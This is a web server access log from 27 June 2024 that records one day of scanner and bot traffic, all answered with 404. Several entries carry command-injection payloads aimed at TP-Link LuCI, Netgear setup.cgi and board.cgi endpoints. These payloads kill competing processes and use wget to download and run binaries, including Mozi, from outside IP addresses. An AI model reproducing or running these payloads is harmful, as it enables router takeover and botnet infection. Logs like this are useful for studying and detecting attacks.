205.210.31.82 - - [27/Jun/2024:00:51:57 +0200] "GET / HTTP/1.0" 404 952 10.132.0.215 - - [27/Jun/2024:02:09:24 +0200] "GET / HTTP/1.1" 404 952 87.236.176.5 - - [27/Jun/2024:02:18:08 +0200] "GET / HTTP/1.1" 404 952 52.228.154.190 - - [27/Jun/2024:02:32:57 +0200] "GET /hudson HTTP/1.1" 404 952 167.99.168.227 - - [27/Jun/2024:03:41:51 +0200] "GET / HTTP/1.1" 404 952 167.99.168.227 - - [27/Jun/2024:03:41:51 +0200] "GET /download/powershell/ HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:03:58:45 +0200] "GET / HTTP/1.1" 404 952 51.8.223.32 - - [27/Jun/2024:04:19:20 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:04:35:08 +0200] "GET / HTTP/1.1" 404 952 138.68.162.131 - - [27/Jun/2024:05:09:58 +0200] "GET / HTTP/1.1" 404 952 138.68.162.131 - - [27/Jun/2024:05:09:58 +0200] "GET /download/powershell/ HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:05:21:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:05:21:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 167.99.92.103 - - [27/Jun/2024:05:45:39 +0200] "GET / HTTP/1.0" 404 952 190.7.149.242 - - [27/Jun/2024:05:57:26 +0200] "GET / HTTP/1.1" 404 952 45.148.10.174 - - [27/Jun/2024:06:02:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [27/Jun/2024:06:02:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:06:17:15 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:07:05:52 +0200] "GET / HTTP/1.1" 404 952 64.62.197.181 - - [27/Jun/2024:07:23:53 +0200] "GET / HTTP/1.1" 404 952 64.62.197.168 - - [27/Jun/2024:07:24:16 +0200] "GET /favicon.ico HTTP/1.1" 404 952 64.62.197.174 - - [27/Jun/2024:07:24:28 +0200] "GET /?format=json HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:08:01:33 +0200] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:09:02:41 +0200] "GET / HTTP/1.1" 404 952 45.128.232.200 - - [27/Jun/2024:09:29:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952 51.8.222.203 - - [27/Jun/2024:09:52:40 +0200] "GET /actuator/health HTTP/1.1" 404 952 185.191.126.213 - - [27/Jun/2024:10:23:38 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:10:49:11 +0200] "GET / HTTP/1.1" 404 952 118.40.165.223 - - [27/Jun/2024:10:53:00 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952 45.128.232.200 - - [27/Jun/2024:11:07:41 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952 198.235.24.92 - - [27/Jun/2024:11:13:43 +0200] "GET / HTTP/1.1" 404 952 167.94.138.44 - - [27/Jun/2024:11:34:53 +0200] "GET / HTTP/1.1" 404 952 78.108.177.50 - - [27/Jun/2024:11:48:38 +0200] "GET / HTTP/1.0" 404 952 45.148.10.174 - - [27/Jun/2024:12:25:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 45.148.10.174 - - [27/Jun/2024:12:25:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:12:26:21 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:12:48:11 +0200] "GET / HTTP/1.1" 404 952 83.97.73.245 - - [27/Jun/2024:13:26:13 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 952 83.97.73.245 - - [27/Jun/2024:13:49:13 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 952 87.246.7.54 - - [27/Jun/2024:13:55:03 +0200] "GET / HTTP/1.0" 404 952 45.156.129.48 - - [27/Jun/2024:14:19:19 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 952 159.89.182.136 - - [27/Jun/2024:14:53:00 +0200] "GET / HTTP/1.1" 404 952 159.89.182.136 - - [27/Jun/2024:14:53:00 +0200] "GET /favicon.ico HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:15:06:59 +0200] "GET / HTTP/1.1" 404 952 117.245.33.249 - - [27/Jun/2024:15:08:55 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.245.33.249:53217/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 952 141.98.83.197 - - [27/Jun/2024:15:40:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:15:40:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:16:16:08 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:17:10:32 +0200] "GET / HTTP/1.1" 404 952 200.81.185.179 - - [27/Jun/2024:19:03:48 +0200] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:19:25:37 +0200] "GET / HTTP/1.1" 404 952 188.166.153.36 - - [27/Jun/2024:19:52:49 +0200] "GET / HTTP/1.1" 404 952 188.166.153.36 - - [27/Jun/2024:19:52:49 +0200] "GET /download/powershell/ HTTP/1.1" 404 952 104.168.70.165 - - [27/Jun/2024:19:54:15 +0200] "GET / HTTP/1.1" 404 952 45.114.152.19 - - [27/Jun/2024:20:00:20 +0200] "GET / HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:20:10:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:20:10:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:20:18:14 +0200] "GET / HTTP/1.1" 404 952 45.156.130.6 - - [27/Jun/2024:20:38:22 +0200] "GET /favicon.ico HTTP/1.1" 404 952 89.226.61.251 - - [27/Jun/2024:20:58:37 +0200] "GET / HTTP/1.0" 404 952 43.153.21.216 - - [27/Jun/2024:21:38:33 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:21:47:14 +0200] "GET / HTTP/1.1" 404 952 45.79.181.223 - - [27/Jun/2024:22:36:44 +0200] "GET / HTTP/1.1" 404 952 193.37.252.115 - - [27/Jun/2024:22:42:11 +0200] "GET / HTTP/1.1" 404 952 193.37.252.115 - - [27/Jun/2024:22:42:11 +0200] "GET /HNAP1/ HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:22:53:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 952 141.98.83.197 - - [27/Jun/2024:22:53:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 952 45.128.232.200 - - [27/Jun/2024:22:54:16 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952 10.140.0.95 - - [27/Jun/2024:22:59:11 +0200] "GET / HTTP/1.1" 404 952 117.235.156.167 - - [27/Jun/2024:22:59:53 +0200] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.235.156.167:44386/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 952 149.50.103.48 - - [27/Jun/2024:23:12:03 +0200] "GET / HTTP/1.1" 404 952 149.50.103.48 - - [27/Jun/2024:23:53:26 +0200] "GET / HTTP/1.1" 404 952